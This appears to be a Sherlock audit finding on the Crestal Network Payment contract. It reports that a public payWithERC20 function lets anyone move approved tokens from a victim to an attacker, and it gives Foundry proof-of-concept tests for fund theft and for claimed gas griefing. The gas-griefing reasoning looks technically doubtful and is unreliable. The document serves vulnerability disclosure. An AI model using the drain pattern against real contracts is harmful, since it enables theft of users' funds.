Sour Menthol Whale

High

# Payment::payWithERC20 can be used to carry griefing attacks or steal funds

### Summary

In the [Payment](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Payment.sol) Contract there is a function [`payWithERC20`](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Payment.sol#L25-L32) which is of the visibility and accessibility public. This function can be used to transfer amount from specified `fromAddress` (to) ->   `toAddress` based on the approval set.


So basically there are certain instances when this could be exploited : 
- If the victim is phished to approve tokens to `Payment` contract
- If victim has already approved tokens, and forgot to revoke it

Then it could be exploited to transfer from victim to attacker address, as there is no validation in place to check if `fromAddress` is `msg.sender`.

Also **gas griefing** could be done by front-running whenever a user is about to make calls to functions which uses `Payment::payWithERC20` in the function in `BlueprintCore` : `createAgentWithToken`, `createAgentWithTokenWithSig`, `createAgentWithNFT`, `createAgentWithWhitelistUsers`, `createAgentWithWhitelistUsersWithSig`, `createAgentWithSigWithNFT` , `userTopUp`, `updateWorkerDeploymentConfig` etc since they make underlying calls to `Payment::payWithERC20`. 
Gas griefing could be done by simply make repeatedly calls to `payWithERC20` with tiny amount like 1. So attacker calls this function thousand of times and hence the above functions would be charged too high, or might revert due to it.

### Root Cause

Root cause for gas-griefing attack and the scenario based exploitation is the same :
Having the accessibility and modifier of the `Payment::payWithERC20` set to `public` instead of `internal`

### Internal Pre-conditions

Fund drainage/stealing : 
- If the victim is phished to approve tokens to `Payment` contract
- If victim has already approved tokens, and forgot to revoke it

### External Pre-conditions

Gas Griefing : 
- Attacker calls the `Payment::payWithERC20` thousands of times to inflate the gas price by sending small `amount` to their own wallets

### Attack Path

1. Fund Stealing/drainage : Attacker calls `payWithERC20` with the `fromAddress` as victim and `toAddress` as his own.
2. Calling the `Payment::payWithERC20` thousands of times to inflate the gas price by sending small `amount` to their own wallets so that the core functions involving the usage of the above function is griefed from using multiple function and break the protocol.

### Impact

- Normal Users could not use core functions like :   `createAgentWithToken`, `createAgentWithTokenWithSig`, `createAgentWithNFT`, `createAgentWithWhitelistUsers`, `createAgentWithWhitelistUsersWithSig`, `createAgentWithSigWithNFT` , `userTopUp`, `updateWorkerDeploymentConfig` because the function `Payment::payWithERC20` is used in those function which is gas griefed.
 
- Victim users could loose their funds if they are tricked or made mistake to approve their funds access to Payment.


### PoC

```solidity  
  // Stealing funds/drainage
  function test_PaymentFunctionIsPublic() public {

        // What if victim has approved it's balance to payment contract or has been phished to do so:
        address approvedVictim = makeAddr("Alice-Victim");
        address attacker = makeAddr("Attacker");
        deal(address(mockToken),approvedVictim, 1000000000000);
        Payment payment = new Payment();
        
        vm.prank(approvedVictim);
        mockToken.approve(address(payment),110000000);
        vm.prank(attacker);
        payment.payWithERC20(address(mockToken),10000000, approvedVictim,attacker);
        console.log("Attacker's balance : ", mockToken.balanceOf(attacker));

    }
```


Gas griefing attack, : 
```solidity
    function test_gasGriefAttack() public {
        Payment payment = new Payment();

        address attacker = makeAddr("Attacker");
        address attacker2 = makeAddr("Attacker2");
        deal(address(mockToken),attacker, 100000000); 
        
        vm.startPrank(attacker);
        mockToken.approve(address(payment), 10000000);
        // Make the loop small, if you want to increase the gas price and not attack and revert the users
        for (uint i = 0; i < 1000000; i++) {
            payment.payWithERC20(address(mockToken),1,attacker,attacker2);
        }
        vm.stopPrank();
        uint256 topUpAmount = 100 * 10 ** 18;

        // Add the payment address
        blueprint.addPaymentAddress(address(mockToken));

        // Mint tokens to the test account
        mockToken.mint(address(this), topUpAmount);

        // Approve the blueprint contract to spend tokens
        mockToken.approve(address(blueprint), topUpAmount);

        // Expect the UserTopUp event
        vm.expectEmit(true, true, true, true);
        emit BlueprintCore.UserTopUp(
            address(this), blueprint.feeCollectionWalletAddress(), address(mockToken), topUpAmount
        );

        // Call the userTopUp function
        blueprint.userTopUp(address(mockToken), topUpAmount);

    }



```

### Mitigation

Make the function visibility `internal` : 

```diff
-  function payWithERC20(address erc20TokenAddress, uint256 amount, address fromAddress, address toAddress) public {
+  function payWithERC20(address erc20TokenAddress, uint256 amount, address fromAddress, address toAddress) internal {  
```
